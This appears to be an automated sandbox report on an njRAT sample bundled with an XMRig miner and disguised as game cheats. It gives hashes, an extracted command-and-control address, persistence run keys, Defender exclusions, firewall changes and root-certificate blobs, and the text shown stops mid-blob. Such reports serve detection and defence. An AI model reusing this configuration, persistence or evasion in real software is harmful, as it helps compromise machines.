njrat | 461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c

Analysis

max time kernel
149s
max time network
151s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
05-02-2025 19:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe
Size

57.6MB
MD5

0956d30facdbb958dabe6d13e751976f
SHA1

80cd8d27d451f221c58541a68566d49463d97aeb
SHA256

461fdcdb19845c43f5b6e7539071b752a07b272cf50ab0546302ccd036571e8c
SHA512

c0457356da8ea38a4b7445b79e8d7bd95b76fbdfd6707b84df2bd0f8cf62f65316b7bc6c34c4c2044f35a7cb6bf937c9efcb73760581e5514e6cb1776f17a463
SSDEEP

1572864:Lf3VbWblqQ2LTbGk2kR0zvpspjSG/kt7Rb2n6CL0d:r3VLHbGkjRM+SGx6Uo

Score

10^/10

njrat xmrig hacked defense_evasion discovery execution miner persistence privilege_escalation trojan upx

Malware Config

Extracted

Family

njrat

Version

0.7d

Botnet

HacKed

postpix.shop:1177

Mutex

aa63d8c3a8435a58d0b9f32e46b3a601

Attributes

reg_key
aa63d8c3a8435a58d0b9f32e46b3a601
splitter
|'|'|

Signatures

Njrat family
njrat
Xmrig family
xmrig
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 24 IoCs

miner

resource	yara_rule
behavioral1/memory/752-77-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/752-83-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/752-82-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/752-80-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/752-79-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/752-76-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/752-81-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral1/memory/2632-460-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2632-458-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2632-455-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2632-454-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2632-451-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2632-449-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2632-448-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2632-443-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2632-441-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2632-439-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2632-467-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2632-466-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2632-465-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2632-464-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2632-463-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2632-462-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig
behavioral1/memory/2632-445-0x0000000140000000-0x0000000140786000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
3068	powershell.exe
2460	powershell.exe
592	powershell.exe
1728	powershell.exe
2864	powershell.exe
2960	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Downloads MZ/PE file 1 IoCs

flow	pid	Process
18	2020	CheatEngine75.tmp

Modifies Windows Firewall 2 TTPs 1 IoCs

defense_evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2760	netsh.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aa63d8c3a8435a58d0b9f32e46b3a601.exe	Windows Defender.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aa63d8c3a8435a58d0b9f32e46b3a601.exe	Windows Defender.exe

Executes dropped EXE 14 IoCs

pid	Process
2972	Server.exe
2724	Windows Defender.exe
2944	build.exe
1028	FiveM.exe
472	Process not Found
2224	dlpwxhhxvcgc.exe
1648	Rename_Z60IHLDjO6.exe
2124	FiveM Hack.exe
2988	FiveM Hack.exe
1224	Process not Found
1868	CheatEngine75.exe
2020	CheatEngine75.tmp
480	services64.exe
1552	sihost64.exe

Loads dropped DLL 28 IoCs

pid	Process
2084	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe
2084	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe
2084	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe
2972	Server.exe
2084	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe
2084	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe
2084	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe
472	Process not Found
2084	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe
660	Process not Found
2084	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe
2124	FiveM Hack.exe
2988	FiveM Hack.exe
2988	FiveM Hack.exe
2988	FiveM Hack.exe
2988	FiveM Hack.exe
2988	FiveM Hack.exe
2988	FiveM Hack.exe
2988	FiveM Hack.exe
2084	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe
2084	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe
2084	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe
2084	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe
1868	CheatEngine75.exe
2528	cmd.exe
2020	CheatEngine75.tmp
2020	CheatEngine75.tmp
2776	conhost.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\aa63d8c3a8435a58d0b9f32e46b3a601 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Defender.exe\" .."	Windows Defender.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\aa63d8c3a8435a58d0b9f32e46b3a601 = "\"C:\\Users\\Admin\\AppData\\Roaming\\Windows Defender.exe\" .."	Windows Defender.exe

Checks for any installed AV software in registry 1 TTPs 9 IoCs

Security Software Discovery

T1518.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Avira\Browser\Installed	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV\Dir	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVG\AV\Dir	CheatEngine75.tmp
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\SOFTWARE\AVG\AV\Dir	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SOFTWARE\Avira\Browser\Installed	CheatEngine75.tmp
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\SOFTWARE\Avira\Browser\Installed	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast	CheatEngine75.tmp
Key opened	\REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\SOFTWARE\AVAST Software\Avast	CheatEngine75.tmp

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	build.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	dlpwxhhxvcgc.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2224 set thread context of 1812	2224	dlpwxhhxvcgc.exe	55
PID 2224 set thread context of 752	2224	dlpwxhhxvcgc.exe	57
PID 2776 set thread context of 2632	2776	conhost.exe	82

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/752-77-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/752-75-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/752-74-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/752-73-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/752-83-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/752-82-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/752-80-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/752-79-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/752-72-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/752-71-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/752-76-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/memory/752-81-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral1/files/0x0005000000019cad-179.dat	upx
behavioral1/memory/2988-181-0x000007FEEC6D0000-0x000007FEECCB8000-memory.dmp	upx

Drops file in Windows directory 2 IoCs

description	ioc	Process
File created	C:\Windows\wusa.lock	wusa.exe
File created	C:\Windows\wusa.lock	wusa.exe

Launches sc.exe 4 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2816	sc.exe
1548	sc.exe
2228	sc.exe
1952	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Server.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Windows Defender.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CheatEngine75.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CheatEngine75.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	461fdcdb19845c43f5b6e7539071b752a07b272cf50ab.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	CheatEngine75.tmp
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\	CheatEngine75.tmp

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = b035c7b50678db01	powershell.exe

Modifies system certificate store 2 TTPs 8 IoCs

defense_evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 190000000100000010000000fd960962ac6938e0d4b0769aa1a64e260f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a040000000100000010000000324a4bbbc863699bbe749ac6dd1d46242000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	CheatEngine75.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6	CheatEngine75.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 0f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	CheatEngine75.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 19000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca61d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e4090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f006700690065007300000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a92000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	CheatEngine75.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 040000000100000010000000a923759bba49366e31c2dbf2e766ba870f000000010000001400000007eeabaf80a9ef4ae1b2cb9b4b5fc70d0428e6a953000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000002e00000053007400610072006600690065006c006400200054006500630068006e006f006c006f0067006900650073000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000a848b4242fc6ea24a0d78e3cb93c5c78d79833e41d00000001000000100000005959ddbc9c7632ba0a05f06316846fe6030000000100000014000000317a2ad07f2b335ef5a1c34e4b57e8b7d8f1fca619000000010000001000000044ba5fd9039fc9b56fd8aadccd597ca62000000001000000eb020000308202e730820250020101300d06092a864886f70d01010505003081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d301e170d3939303632363030313935345a170d3139303632363030313935345a3081bb312430220603550407131b56616c69436572742056616c69646174696f6e204e6574776f726b31173015060355040a130e56616c69436572742c20496e632e31353033060355040b132c56616c694365727420436c617373203220506f6c6963792056616c69646174696f6e20417574686f726974793121301f06035504031318687474703a2f2f7777772e76616c69636572742e636f6d2f3120301e06092a864886f70d0109011611696e666f4076616c69636572742e636f6d30819f300d06092a864886f70d010101050003818d0030818902818100ce3a71cae5abc8599255d7abd8740ef9eed9f655475965470e0555dceb98363c5c535dd330cf38ecbd4189ed254209246b0a5eb37cdd522d4ce6d4d67d5a59a965d449132d244d1c506fb5c185543bfe71e4d35c42f980e0911a0a5b393667f33f557c1b3fb45f647334e3b412bf8764f8da12ff3727c1b343bbef7b6e2e69f70203010001300d06092a864886f70d0101050500038181003b7f506f6f509499496238381f4bf8a5c83ea78281f62bc7e8c5cee83a1082cb18008e4dbda8587fa17900b5bbe98daf41d90f34ee218119a0324928f4c48e56d55233fd50d57e996c03e4c94cfccb6cab66b34a218ce5b50c323e10b2cc6ca1dc9a984c025bf3ceb99ea5720e4ab73f3ce61668f8beed744cbc5bd5621f43dd	CheatEngine75.tmp
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A	CheatEngine75.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 0f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6500b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e71d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a2000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e1335235edf9b5f3defd6f776c2ea3ebb780d1c42676b04d8f8d6da6f8bf244a001ab020103a381c53081c2301d0603551d0e04160414bf5fb7d1cedd1f86f45b55acdcd710c20ea988e73081920603551d2304818a3081878014bf5fb7d1cedd1f86f45b55acdcd710c20ea988e7a16ca46a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100059d3f889dd1c91a55a1ac69f3f359da9b01871a4f57a9a179092adbf72fb21eccc75e6ad88387a197ef49353e7706415862bf8e58b80a673fecb3dd21661fc954fa72cc3d4c40d881af779e837abba2c7f534178ed91140f4fc2c2a4d157fa7625d2e25d3000b201a1d68f917b8f4bd8bed2859dd4d168b1783c8b265c72d7aa5aabc53866ddd57a4caf820410b68f0f4fb74be565d7a79f5f91d85e32d95bef5719043cc8d1f9a000a8729e95522580023eae31243295b4708dd8c416a6506a8e521aa41b4952195b97dd134ab13d6adbcdce23d39cdbd3e7570a1185903c922b48f9cd55e2ad7a5b6d40a6df8b74011469a1f790e62bf0f97ece02f1f1794	CheatEngine75.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\AD7E1C28B064EF8F6003402014C3D0E3370EB58A\Blob = 040000000100000010000000324a4bbbc863699bbe749ac6dd1d4624030000000100000014000000ad7e1c28b064ef8f6003402014c3d0e3370eb58a1d000000010000001000000090c4f4233b006b7bfaa6adcd8f577d77140000000100000014000000bf5fb7d1cedd1f86f45b55acdcd710c20ea988e709000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005400000053007400610072006600690065006c006400200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000000f6aad4c3fe04619cdc8b2bd655aa1a26042e6502000000001000000130400003082040f308202f7a003020102020100300d06092a864886f70d01010505003068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137333931365a170d3334303632393137333931365a3068310b300906035504061302555331253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e31323030060355040b1329537461726669656c6420436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100b732c8fee971a60485ad0c1164dfce4defc80318873fa1abfb3ca69ff0c3a1dad4d86e2b5390fb24a43e84f09ee85fece52744f528a63f7bdee02af0c8af532f9eca0501931e8f661c39a74dfa5ab673042566eb777fe759c64a99251454eb26c7f37f19d530708fafb0462affadeb29edd79faa0487a3d4f989a5345fdb43918236d9663cb1b8b982fd9c3a3e10c83bef0665667a9b19183dff71513c302e5fbe3d7773b25d066cc323569a2b8526921ca702b3e43f0daf087982b8363dea9cd335b3bc69caf5cc9de8fd648d1780336e5e4a5d99c91e87b49d1ac0d56e13352